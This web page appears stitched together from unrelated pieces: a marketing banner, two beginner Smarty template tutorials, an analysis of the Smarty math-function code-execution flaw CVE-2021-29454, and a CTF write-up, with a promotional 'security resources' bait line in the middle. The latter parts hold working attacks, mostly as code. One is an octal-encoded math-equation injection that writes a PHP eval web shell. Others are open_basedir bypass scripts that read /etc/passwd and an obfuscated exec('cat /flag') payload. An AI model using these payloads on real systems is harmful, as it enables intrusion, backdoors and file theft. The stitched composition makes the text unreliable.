整合營銷服務商
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
電腦端+手機端+微信端=數據同步管理
免費咨詢熱線:
道框架(framework)那么必須要提到smarty模板,在面試時你可以不會任何的框架,但是如果不會smarty模板,那么面試官會認為你在說謊,因為幾乎所有的框架都是基于或借鑒smarty。
smarty模板介紹
基于面向對象編程思想封裝的類,實現前后臺代碼分離,降低耦合度,并且為后續的分工合作開發做準備。Smarty(輕量,微小)是編譯性模板框架,體積小、速度快,支持緩存、全局站點配置等功能,是“旅行居家”開發必備神器!
使用步驟
1、在官網www.smarty.net 下載最新版,解壓,復制libs文件夾到項目目錄;
2、在對應的項目目錄下創建4個文件夾分別為模板文件夾(保存前臺頁面,必須,一般命名為templates)、編譯(自動整理前后臺頁面,從第二次訪問開始不需要重新重新整合,一般命名為templates_c,compile必須)、配置文件夾(應用于整個站點的配置)、緩存文件夾
3、測試
新建一個后臺頁面index.php
<?php
//引入核心類庫文件
include_once('libs/Smarty.class.php');
//實例化類
$smarty=new Smarty();
//定義配置
//用戶訪問的后臺頁面所有的路徑都是應該以訪問后臺頁面作為參照物!!!
$smarty->setTemplateDir('templates');//定義模板路徑
//定義編譯路徑
$smarty->setCompileDir('templates_c');
//定義配置文件路徑
$smarty->setConfigDir('config');
//定義緩存路徑
$smarty->setCacheDir('cache');
//修改默認定界符避免和JS沖突!!!
$smarty->left_delimiter='<{';
$smarty->right_delimiter='}>';
$test='我是test變量';
$smarty->assign("test",$test);//建議注冊的變量名和鍵保持一致
//注冊一個索引數組
$smarty->assign("arr1",array('a','b','c'));
//注冊一個引用數組,section無法用于引用數組
$smarty->assign("arr2",array("a"=>1,"b"=>2,"c"=>3));
//開啟調測
//$smarty->debugging=true;
//自動整理前后臺頁面
$smarty->display('index.tpl');
$smarty->assign('test1','test1');//這個變量無法使用,想一想為什么?
?>
在templates文件加新建index.tpl文件
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>無標題文檔</title>
</head>
<body>
我是網站根目錄下index.php的前臺index.tpl頁面<br />
輸出后臺變量test的值:<font color="red" style="font-weight:bold;"><{$test}></font>XXXX<br />
該變量無法輸出:<{$test1}><br />
遍歷輸出索引數組:
<{section name=i loop=$arr1}>
索引:<{$smarty.section.i.index}>值:<{$arr1[i]}>
<{sectionelse}>
沒有符合的記錄
<{/section}>
<br />
遍歷引用數組(用foeach,foreach也可以用于索引數組):
<{foreach from=$arr2 item=v key=k}>
鍵:<{$k}>值:<{$v}>
<{foreachelse}>
沒有符合的記錄集
<{/foreach}>
<br />
新版本寫法:
<{foreach $arr2 as $k=>$v}>
鍵:<{$k}>值:<{$v}>
<{/foreach}>
</body>
</html>
訪問后臺頁面!!!!!測試結果
變量解析
后臺注冊,語法 $smarty對象->assign(‘鍵’,mixed 值);
前臺在需要的位置顯示,語法 {$鍵}
開啟調測
$smarty->debugging=true;
編譯原理
smarty模板調用display函數自動整合前后臺頁面,是從templates文件夾下查找前臺地址自動把訪問的后臺php頁面和該前臺頁面替換成內嵌PHP代碼,生成編譯文件,文件名XXX.前臺模板名.tpl.php,第二次訪問自動把這個頁面相應給用戶,加快速度,只要PHP后臺代碼不改變,這個編譯頁面就不會再次生成。
天主要跟大家分享下模板引擎
目前常見的模板引擎有以下這幾種,模板引擎Smarty,Blade,Twig,Haml,Liquid,Mustache
其中最為常見的,比較主流的Smarty,Blade,這兩個分別對應是tp以及laravel
今天給大家講解下什么是smarty
smarty是一個用PHP寫的模板引擎,它提供了一個前后端分類計數,前端開發前端,后臺開發后端的,美工開發美工的,互相不影響,可以極大的提升工作效率。
下來給大家介紹下smarty優點:
如果你使用過tp框架開發的話應該對這塊比較熟悉的
1. 開發速度快:用smarty編寫的程序速度會很快,因為傳統的php寫一個遍歷,如果沒有前后端分離,你需要寫大量的代碼,并且需要花費很多時間,這一點是相對于其它的模板引擎技術而言的。
2. 代碼編譯型:因為這個模板引擎是PHP與HTML混合的方式,在下一次訪問模板時將WEB請求直接保存到一個指定的文件目錄中,而不再進行模板重新編譯
3. 模板緩存技術:smarty選用的一種緩存技術,使用模板開發可以提供頁面的加載速度,對網站的性能也一種優化,這種模板緩存只要開啟了之后,在一段時間內容,他在渲染會去比對頁面內用,如果頁面一直,直接調動靜態文件,我們都知道靜態文件訪問速度是最快,減少io資源消耗,如果不一樣怎么請求最新的數據再次緩存
不適合smarty的地方:
1. 對數據的實時性要求比較高的就不怎么合適,比例像在線聊天,熱點新聞等都不適用。因為模板緩存的優勢在于對頁面的實時性要求不高
2. 項目太小的也不大適合,因為使用模板引擎需要實現分好,這個小團隊開發的速度不會體驗的很方便
現在教大家如何去使用smarty
1.https://www.smarty.net/download 登錄地址,去下載相對應的版本
Smarty 3.x: PHP 5.2+
Smarty 2.x: PHP 4 or 5
這個有版本要求,你只要根據你的開發環境去下載對應的版本即可
demo文件夾為示例文件夾,里面包含默認文件夾結構,是我們要進行編寫程序代碼的主要文件夾。demo里文件夾的名稱都是smarty默認的目錄結構名稱,可以通過改smarty對應屬性值,再把文件夾名改成我們想要的名稱。
libs為smarty代碼源文件夾,一般不動。
/libs/Smarty.class.php #主文件
/libs/sysplugins/ #內部plugin
/libs /plugins/ #外部plugin,可自由擴充
/demo/cahce/ #放置緩存文件
/demo/configs / #放置可以載入的配置文件
/demo/templates/ #放置模板文件
/demo/templates_c/ #放置對模板編譯后的文件
可以把解壓得到的 Smarty-3.1.12 文件夾名改成我們想要的項目名,demo也可以改成我們想要的具體存放編碼的文件夾的名稱
2、調試Smarty-3.1.12
接下來我們去創建自己的文件,在D盤下demo文件夾下創建index.php。
在templates目錄中創建模板index.tpl
(幾乎可以是任何文本文件的擴展名,這個模板引擎常用的是tpl,php,html,不建議使用后兩者,因為可以從瀏覽器直接訪問而不安全。可以對apache的httpd.conf進行設置,禁止直接訪問.tpl文件。或者將templats目錄放在網站文檔樹之外,可以大大的提升站點安全性。)
*/
//接下來我們直接用代碼演示
require('../libs/Smarty.class.php'); //index.php代碼
$smarty = new Smarty; //實例化對象
$smarty->assign('name','zhang');//對變量賦值 直接將zhang賦值給變量 name
$smarty->display('templates/index.tpl'); //調用模板tpl文件里不能執行PHP語句塊
/*
index.tpl頁面內容
<html>
<body>
我們可以直接使用 {$name} {}里面就是對應的變量 直接輸出模板
<span>測試一下 {$name}</span>
</body>
</html>
*/
/*
上面的代碼操作是不是很簡單,傳統的我們需要顯示變量需要使用
<?php echo $name?> 這么長的一串代碼
smarty處理過程
smarty是將原本php源文件,把他編譯成中間文件也是php腳本文件,如果說你開啟緩存,會根據編譯文件再次生成緩存文件(也是php)。
之后的每次訪問都會訪問編譯文件,如果啟用緩存且有緩存文件而且沒有過期,則直接訪問緩存文件,跳過編譯文件。這樣子的就可以提升你的網頁加載速度
編譯文件一經生成,就不會被自動更新,除非模板文件或者配置文件更改。源php文件修改是不會引發重新編譯的。
*/
//Smarty允許有兩種特殊的編譯設置存在:
// 下面給大家介紹下關于模板緩存的開啟
$smarty->setCaching(true); //開啟緩存
$smarty->getCaching();//獲取當前緩存狀態,默認是false關閉的
$smarty->setcache_lifetime(60);//設置緩存時間單位秒
/*
smarty分界符
在模板文件中,區分普通html代碼和smarty代碼靠的是分界符。默認是 {} ,但可能會與js和css相沖突。可以進行變更。
*/
$smarty->left_delimiter = "{"; //左分界符,2.0屬性,3.0沿用
$smarty->right_delimiter = "}";
/*
分界符就相當于PHP的echo,分界符中的值都將輸出,除非賦值等操作
smarty tpl文件中分界符中兩個**之間的內容為注釋內容如
tpl文件:
{*這是模板注釋內容*}
*/
//設置緩存目錄路徑,不設默認"cache"
$smarty->setCacheDir("cache");
//獲取緩存目錄路徑
$smarty->getCacheDir();
//設置配置目錄路徑,不設默認"configs"
$smarty->setConfigDir("configs");
//添加配置目錄路徑,所有路徑將會以數組形式保存,調用文件時將在所有路徑中查找
$smarty->addConfigDir("configs/test");
//獲取配置目錄路徑的數組
$smarty->getConfigDir();
//設置插件目錄路徑,不設默認"plugins"
$smarty->setPluginsDir("plugins");
//添加插件目錄路徑,所有路徑將會以數組形式保存,調用文件時將在所有路徑中查找,plugins文件夾里放的就是可以在前臺或后臺按不同規則調用的函數的存儲文件,文件名及函數名的命名按不同調用規則有不同寫法要求
$smarty->addPluginsDir("plugins/test");
//獲取插件目錄路徑的數組
$smarty->getPluginsDir();
//設置模板目錄路徑,不設默認"templates"
$smarty->setTemplateDir("templates");
//添加模板目錄路徑,所有路徑將會以數組形式保存,調用文件時將在所有路徑中查找
$smarty->addTemplateDir("templates/test");
//獲取模板目錄路徑的數組
$smarty->getTemplateDir();
//設置編譯目錄路徑,不設默認"templates_c"
$smarty->setCompileDir("templates_c");
//獲取編譯目錄路徑
$smarty->getCompileDir();
//模版變量, 我們傳遞數組
$arr = array(array("name","111"),'a'=>array("age","222"),array("classname","333"));
$smarty->assign("testArr", $arr);
//設置模版變量,為將要調用的模版提供變量,在接下來調用的模版中可以通過{$testArr}或者{$testArr['a'][0]}或者{$testArr.a.0}來訪問具體某數組元素
//在模版中可以直接通過 {$testArr = "testValue" scope="global"} 來更改傳過來的模板變量的值(如果不存在則在模板中創建并設置該模版變量),scope屬性是標注模板變量使用范圍的可不寫
//在模版中更改或創建成其他數組 {$testArr = [1,2,3]}也可以{$testArr = [1,'a'=>2,2=>3]}也可以{$testArr[] = 4}或其他類似PHP中創建數組方式
//php源文件可通過 $smarty->getTemplateVars("testArr") 獲取指定模版變量,如要獲取模板中改變或創建的模版變量,在模板中創建或更改其值時必須加上scope屬性并把值設置為scope="global"或scope="parent"
class SDemo{
function demo($nam){
echo $nam;
}
}
$smarty->assign("obj", new A); //把對象直接賦值給變量
//Smarty可以識別嵌入在雙引號中的模版變量,只要此變量只包含數字、字母、下劃線。但貌似只支持能直接轉換成字符串的模版變量
$smarty->assign("testStr", "this is smart");
//模板中可通過{"$testStr OK !"}來訪問
/*
tpl模板包含模板 使用也很簡單
模板文件:
{include file="headerinfo.tpl"} //這樣子就是直接調用頭部文件
headerinfo.tpl內容:
<span>這是頂部內容!!,歡迎你,{$name}</span>
模板包含模板也可以是這樣格式
{include file="headerinfo.tpl" testVar="這是頂部內容!!!"}
headerinfo.tpl則可以通過{$testVar}使用調用頁包含時傳來的模板變量
<span>{$testVar},歡迎你,{$name}</span><hr />
*/
/*
我們都知道 我們在寫頁面的時候可能涉及到很多邏輯
這個模板引擎也有提供了相應的功能
我們直接使用if判斷
{if $name == "張三"}
你好 張三.
{elseif $name == "李四"}
你好 李四.
{else}
你好, 未知
{/if}
{*操作符可以是 ==,>= 等也可以是 eq,ne等*}
{for $x=0; $x<count($demoArr); $x++}
{$x}
{/for}
{*for循環,類似PHP代碼*}
{$x=0}
{while $x<count($demoArr)}
{$x++}
{/while}
{*While循環,也類似PHP代碼。*}
{*也可以如下兩種類PHP格式*}
{foreach $demoArr as $n}
{$n}
{/foreach}
{foreach $demoArr as $key=>$n}
{$key}
{/foreach}
*/
//PHP文件:
//$smarty->setDebugging(true);//對后續調用的模板進行調試。
//$smarty->getDebugging();//得到當前是否進行調試,默認false
//或在需要調試的模版中寫入{debug}
/*
模板文件:
smarty3.0支持了模版繼承系統,例如
nav.tpl:
<html>
<body>
{block name='top'} nav.header<br />{/block}
{block name='middle'} nav.middle<br />{/block}
{block name='buttom'} nav.buttom<br />{/block}
</body>
</html>
以上就是一些關于samrt一些基礎操作
大家要是覺得有學習到的話可以收藏關注哦
Smarty 是 PHP 的模板引擎,有助于將表示 (HTML/CSS) 與應用程序邏輯分離。在 3.1.42 和 4.0.2 版本之前,模板作者可以通過制作惡意數學字符串來運行任意 PHP 代碼。如果數學字符串作為用戶提供的數據傳遞給數學函數,則外部用戶可以通過制作惡意數學字符串來運行任意 PHP 代碼。用戶應升級到版本 3.1.42 或 4.0.2 以接收補丁。
對比官方修復的代碼,在/plugins/function.math.php添加了如下一段
// Remove whitespaces
$equation = preg_replace('/\s+/', '', $equation);
// Adapted from https://www.php.net/manual/en/function.eval.php#107377
$number = '(?:\d+(?:[,.]\d+)?|pi|π)'; // What is a number
$functionsOrVars = '((?:0x[a-fA-F0-9]+)|([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*))';
$operators = '[+\/*\^%-]'; // Allowed math operators
$regexp = '/^(('.$number.'|'.$functionsOrVars.'|('.$functionsOrVars.'\s*\((?1)+\)|\((?1)+\)))(?:'.$operators.'(?2))?)+$/';
if (!preg_match($regexp, $equation)) {
trigger_error("math: illegal characters", E_USER_WARNING);
return;
}
對惡意拼接的數學字符串進行過濾(漏洞利用POC格式其實也在這里寫出來了,參考$regexp)
而在較低版本下,缺少過濾部分,進而導致RCE
具體的POC我會在下面利用部分詳寫的
并且,在tests/UnitTests/TemplateSource/ValueTests/Math/MathTest.php中,也有添加
/**
* @expectedException PHPUnit_Framework_Error_Warning
*/
public function testBackticksIllegal()
{
$expected = "22.00";
$tpl = $this->smarty->createTemplate('eval:{$x = "4"}{$y = "5.5"}{math equation="`ls` x * y" x=$x y=$y}');
$this->assertEquals($expected, $this->smarty->fetch($tpl));
}
/**
* @expectedException PHPUnit_Framework_Error_Warning
*/
public function testDollarSignsIllegal()
{
$expected = "22.00";
$tpl = $this->smarty->createTemplate('eval:{$x = "4"}{$y = "5.5"}{math equation="$" x=$x y=$y}');
$this->assertEquals($expected, $this->smarty->fetch($tpl));
}
/**
* @expectedException PHPUnit_Framework_Error_Warning
*/
public function testBracketsIllegal()
{
$expected = "I";
$tpl = $this->smarty->createTemplate('eval:{$x = "0"}{$y = "1"}{math equation="((y/x).(x))[x]" x=$x y=$y}');
$this->assertEquals($expected, $this->smarty->fetch($tpl));
}【→所有資源關注我,私信回復“資料”獲取←】
1、網絡安全學習路線
2、電子書籍(白帽子)
3、安全大廠內部視頻
4、100份src文檔
5、常見安全面試題
6、ctf大賽經典題目解析
7、全套工具包
8、應急響應筆記
考點
過程詳解
看到Smarty,聯系題目描述就明白這是Smarty模板注入,但是出題人修改了模板規則(真滴茍啊)。
一般情況下輸入{$smarty.version},就可以看到返回的Smarty當前版本號,此題版本是3.1.39。
掃一下網站,發現存在源碼泄露,訪問www.zip即可下載,打開分析。
index.php
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Smarty calculator</title>
</head>
<body background="img/1.jpg">
<div align="center">
<h1>Smarty calculator</h1>
</div>
<div style="width:100%;text-align:center">
<form action="" method="POST">
<input type="text" style="width:150px;height:30px" name="data" placeholder=" 輸入值進行計算" value="">
<br>
<input type="submit" value="Submit">
</form>
</div>
</body>
</html>
<?php
error_reporting(0);
include_once('./Smarty/Smarty.class.php');
$smarty = new Smarty();
$my_security_policy = new Smarty_Security($smarty);
$my_security_policy->php_functions = null;
$my_security_policy->php_handling = Smarty::PHP_REMOVE;
$my_security_policy->php_modifiers = null;
$my_security_policy->static_classes = null;
$my_security_policy->allow_super_globals = false;
$my_security_policy->allow_constants = false;
$my_security_policy->allow_php_tag = false;
$my_security_policy->streams = null;
$my_security_policy->php_modifiers = null;
$smarty->enableSecurity($my_security_policy);
function waf($data){
$pattern = "php|\<|flag|\?";
$vpattern = explode("|", $pattern);
foreach ($vpattern as $value) {
if (preg_match("/$value/", $data)) {
echo("<div style='width:100%;text-align:center'><h5>Calculator don not like U<h5><br>");
die();
}
}
return $data;
}
if(isset($_POST['data'])){
if(isset($_COOKIE['login'])) {
$data = waf($_POST['data']);
echo "<div style='width:100%;text-align:center'><h5>Only smarty people can use calculators:<h5><br>";
$smarty->display("string:" . $data);
}else{
echo "<script>alert(\"你還沒有登錄\")</script>";
}
}
在index.php中定義了waf函數,會檢測$data中是否含有php < flag字樣,這個還是蠻好繞的。
還會檢測cookie中login是否存在且值不為零,只要在cookie上添加就好。
剩下的太多了。。。所以我篩選了一下,發現出題人應該只修改過3個文件。
用Beyond Compare對比一下官方模板,發現了出題人重點修改的地方就是正則匹配。
在CVE-2021-29454,有關Smarty的安全問題上,也有提到
if (preg_match('/[a-zA-Z0-9_\x80-\xff](.*)+$/', $_name)) {
$compiler->trigger_template_error("Function name contains invalid characters: {$_name}", null, true);
}
那么接下來,請欣賞各種優雅的過正則姿勢
在正則處打下斷點進行測試,
發現可以通過換行繞過正則
設置完cookie后,url編碼一下,POST傳參,poc執行成功
但是不能直接cat /flag,有disable_functions以及open_basedir,繞過open_basedir的方法可太多了,我之前寫了一篇文章你的open_basedir安全嗎? - 先知社區 (aliyun.com)
symlink(string $target, string $link): bool原理是創建一個鏈接文件 aaa 用相對路徑指向 A/B/C/D,再創建一個鏈接文件 abc 指向 aaa/../../../../etc/passwd,其實就是指向了 A/B/C/D/../../../../etc/passwd,也就是/etc/passwd。這時候刪除 aaa 文件再創建 aaa 目錄但是 abc 還是指向了 aaa 也就是 A/B/C/D/../../../../etc/passwd,就進入了路徑/etc/passwd payload 構造的注意點就是:要讀的文件需要往前跨多少路徑,就得創建多少層的子目錄,然后輸入多少個../來設置目標文件。
<?php
highlight_file(__FILE__);
mkdir("A");//創建目錄
chdir("A");//切換目錄
mkdir("B");
chdir("B");
mkdir("C");
chdir("C");
mkdir("D");
chdir("D");
chdir("..");
chdir("..");
chdir("..");
chdir("..");
symlink("A/B/C/D","aaa");
symlink("aaa/../../../../etc/passwd","abc");
unlink("aaa");
mkdir("aaa");
?>ini_set()用來設置php.ini的值,在函數執行的時候生效,腳本結束后,設置失效。無需打開php.ini文件,就能修改配置。函數用法如下:
ini_set ( string $varname , string $newvalue ) : string<?php
highlight_file(__FILE__);
mkdir('Andy'); //創建目錄
chdir('Andy'); //切換目錄
ini_set('open_basedir','..'); //把open_basedir切換到上層目錄
chdir('..'); //切換到根目錄
chdir('..');
chdir('..');
ini_set('open_basedir','/'); //設置open_basedir為根目錄
echo file_get_contents('/etc/passwd'); //讀取/etc/passwd其實這個正則并不難,我們可以直接利用八進制數,然后借用Smarty的math equation,直接寫入一句話shell,Antsword連接就好。
payload:
eval:{$x="42"}{math equation="(\"\146\151\154\145\137\160\165\164\137\143\157\156\164\145\156\164\163\")(\"\141\56\160\150\160\",\"\74\77\160\150\160\40\145\166\141\154\50\44\137\122\105\121\125\105\123\124\133\47\120\141\143\153\47\135\51\73\77\76\")"}然后蟻劍連接,在根目錄下得到flag
既然我們能利用函數名了,那么我們也可以用一些數學函數執行命令,我當時用就是這一種(其實是另外兩種沒想到,嘿嘿嘿)
<?php
highlight_file(__FILE__);
//error_reporting(0);
include_once('./Smarty/Smarty.class.php');
$smarty = new Smarty();
$my_security_policy = new Smarty_Security($smarty);
$my_security_policy->php_functions = null;
$my_security_policy->php_handling = Smarty::PHP_REMOVE;
$my_security_policy->php_modifiers = null;
$my_security_policy->static_classes = null;
$my_security_policy->allow_super_globals = false;
$my_security_policy->allow_constants = false;
$my_security_policy->allow_php_tag = false;
$my_security_policy->streams = null;
$my_security_policy->php_modifiers = null;
$smarty->enableSecurity($my_security_policy);
//$smarty->display("string:" . '{math equation="p;(\'exp\'[0].\'exp\'[1].\'exp\'[0].\'cos\'[0])(\'cos\'[0].\'abs\'[0].\'tan\'[0].\'floor\'[0].\'floor\'[1].\'abs\'[0].\'log\'[2]);" p=1 }');
$smarty->display("string:" . '{math equation="p;(\'exp\'[0].\'exp\'[1].\'exp\'[0].\'cos\'[0])(\'cos\'[0].\'abs\'[0].\'tan\'[0].\' ./\'.\'floor\'[0].\'floor\'[1].\'abs\'[0].\'log\'[2].\'>1\');" p="1" }');
//exec('cat /flag')>1
?>將執行結果寫入1文件,同樣,因為有disable_functions以及open_basedir,所以執行會不成功嗎,重復姿勢一,就能繞過。
*請認真填寫需求信息,我們會在24小時內與您取得聯系。
